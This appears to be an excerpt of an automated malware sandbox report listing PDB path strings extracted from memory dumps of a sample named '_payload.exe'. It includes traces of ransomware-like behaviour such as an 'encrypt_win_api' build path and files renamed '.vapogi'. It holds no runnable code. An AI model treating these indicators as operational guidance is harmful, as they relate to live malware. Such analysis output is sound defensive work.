                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ft.Wi source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288881573.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279635159.0000000003D06000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280141938.0000000003D15000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288254715.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269368063.0000000004199000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268652417.0000000004181000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\a\\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2325989468.0000000004682000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2328255306.000000000468A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2333695957.000000000468A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2020128101.0000000003D19000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019336815.0000000003D05000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2020095647.0000000003D15000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019923625.0000000003D0D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\acrord32_super_sbx\Adobe\Acrobat\DC\.pdb\gM source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2325989468.0000000004682000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2328255306.000000000468A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2328365004.00000000046AB000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2281607594.0000000004555000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289409280.000000000451B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289789240.0000000004543000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2287934159.000000000451A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\te\0 source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288044780.0000000004301000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280863089.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2288336972.000000000430A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2282294702.00000000042FE000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289471959.0000000004311000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\63\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316636739.0000000004642000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315665397.0000000004642000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\om source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289371112.00000000042A4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304731023.00000000042A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\e\u source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2314858413.00000000041FB000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309490002.00000000041FB000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309043615.00000000041B0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.vapo* source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb/ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220619290.0000000003CDA000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ry\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\a\<o source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316052505.000000000419F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309670464.000000000419D000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309087828.000000000419A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\CH source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304673578.000000000455B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289409280.000000000451B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289789240.0000000004543000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2287934159.000000000451A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304545377.000000000454A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\* source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1969857893.0000000003CC8000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1969596847.0000000003CC2000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289329759.0000000004202000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\} source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279327675.0000000004211000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2281094654.0000000004211000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004203000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\ICE source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220922049.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220484967.0000000003D11000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244916554.0000000003D1B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\BjA source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2310310548.0000000004323000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2308898477.000000000431A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2304397564.000000000431A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271174046.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279774286.0000000004343000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.000000000433C000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271963806.0000000004323000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\nes\L3 source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220619290.0000000003CDA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245981120.0000000003CE7000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245017706.0000000003CDC000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2272328105.0000000004177000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269305125.000000000416F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269073455.000000000415B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244964075.000000000416B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245575111.0000000004199000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004181000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\o**\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246153971.00000000042CA000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2245622886.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244362198.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246064156.000000000429E000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2246411103.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error\* source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220586448.0000000003D01000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220855829.0000000003D07000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: .LOGUser.datntkrnlmp.pdb source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220259603.00000000041F7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2320978316.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316636739.0000000004642000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315665397.0000000004642000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316636739.0000000004642000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315665397.0000000004642000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\* source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280863089.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2282294702.00000000042FE000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ije source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268917126.0000000003D24000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244916554.0000000003D1B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\we\tetz{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269368063.0000000004199000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268652417.0000000004181000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2270401178.00000000041F3000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\tate\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327608090.0000000004613000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2333662373.0000000004622000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271174046.0000000004312000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\& source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269305125.000000000416F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269073455.000000000415B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244964075.000000000416B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb.vapogi source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\p\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004281000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280863089.00000000042F5000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2272250525.00000000042F2000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2282294702.00000000042FE000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271508428.00000000042E0000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268742531.00000000042D6000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\\Q source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315018219.0000000004502000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316096635.0000000004523000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\320\ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2320978316.0000000003D1A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\P source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279197442.00000000042E0000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280968571.00000000042E0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\q source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289409280.000000000451B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2289789240.0000000004543000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2287934159.000000000451A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\OH| source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2268241240.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271174046.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2244648233.0000000004312000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2271963806.0000000004323000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\SystemAppData\a\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\we\tetz{ source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2281481363.00000000041F6000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280221874.00000000041B4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279813612.0000000004199000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2278810719.0000000004174000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280272665.00000000041F3000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2279327675.0000000004179000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\) source: baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2220761760.0000000004281000.00000004.00000020.00020000.00000000.sdmp
